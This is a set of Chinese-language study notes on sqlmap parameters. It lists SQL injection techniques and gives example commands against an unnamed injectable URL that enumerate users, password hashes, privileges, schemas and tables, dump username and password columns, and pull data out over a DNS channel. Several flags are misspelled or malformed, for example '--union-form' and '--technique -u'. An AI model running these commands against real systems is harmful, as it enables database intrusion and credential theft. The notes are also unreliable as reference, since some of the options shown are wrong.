Sqlmap参数学习笔记

sqlmap --technique 参数用来设置具体SQL注入技术

B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U：Union query-based Union查询注入

S:Stacked queries 堆叠注入

T：Time-based blind 基于时间的盲注

Q：lnline queries 内联查询注入

例如：

sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。

1、sqlmap设置时间盲注延迟时间

例如： sqlmap -u "存在注入点的URL" --time-sec 3 --current-db

2、sqlmap设置UNION字段数

sqlmap -u “存在注入的URL" --union-cols 12-18 --current-db

3、sqlmap设置union查询表

sqlmap -u “存在注入的URL" --technique u --union-form users --current-db -v3

4、sqlmap设置DNS攻击

定义：通过设置DNS流量来突破限制 --dns-domain "dns服务器" 需要用户自身具有一个开放53端口的DNS服务器，通过DNS流量来获得web应用程序中数据内容。

5、sqlmap设置二次注入

sqlmap中可以设置二次注入的结果页面

sqlmap -u "存在注入的URL" --second-order

6、sqlmap识别指纹

sqlmap -u "存在注入的URL" --fingerprint -f

探测目标指纹信息（--fingerprint -f)

7、sqlmap检索DBMS Banner

获取后端数据库Banner信息 --banner 或者 -b

8、sqlmap检索DBMS当前用户

获取DBMS当前用户 --current-user

9、sqlmap检索DBMS当前数据库

获取当前数据库名 --current-db

10、sqlmap检索DBMS当前 主机名

--hostname

11、sqlmap探测当前用户DBA

--is-dba 探测当前用户是否是数据库管理员

12、sqlmap 枚举DBMS用户名

--user 获取DBMS所有用户

13、sqlmap枚举DBMS的用户名密码

--password 获取用户名密码

mysql -h IP地址 -u root -p #MySQL数据库登录

14、sqlmap枚举DBMS权限

--privileges--role（角色）

例如：sqlmap -u "存在注入的URL" --technique -u -v3 --batch --privileges

15、sqlmap列举数据库名

--dbs 列举数据库名称

16、sqlmap枚举数据库表

--tables 枚举表名 --> 制定具体数据库 -D 数据库名

--exclude-sysdbs

例如：(1)sqlmap -u "存在注入的URL" -D 数据库名 --tables

(2)sqlmap -u "存在注入的URL" --tables --exclude-sysdbs

17、sqlmap枚举数据表列

--columns -D 指定数据库 -T 指定数据表 -C 指定具体字段

例如：sqlmap -u "存在注入的URL地址" -D 数据库名 -T 用户名 --columns

18、sqlmap枚举数据值

--dump

例如：sqlmap -u "存在注入的URL地址" -D 数据库名 -T 表名 -C “username，password" --dump

19、sqlmap枚举schema信息

定义：用户可以使用此开关--schema检索DBMS模式。模式列表将所有的数据库、表和列，以及它们各自的类型。与--exclude-sysdb结合使用时，只会检索和显示包含非系统数据库的模式的一部分

例如：sqlmap -u "存在注入的URL地址" --schema--batch --exclude-sysdbs

20、sqlmap检索数据表的数量

如果用户只想知道表中的条目数，则可以使用此开关。

--count

例如：sqlmap -u "存在注入的URL地址" --count -D testdb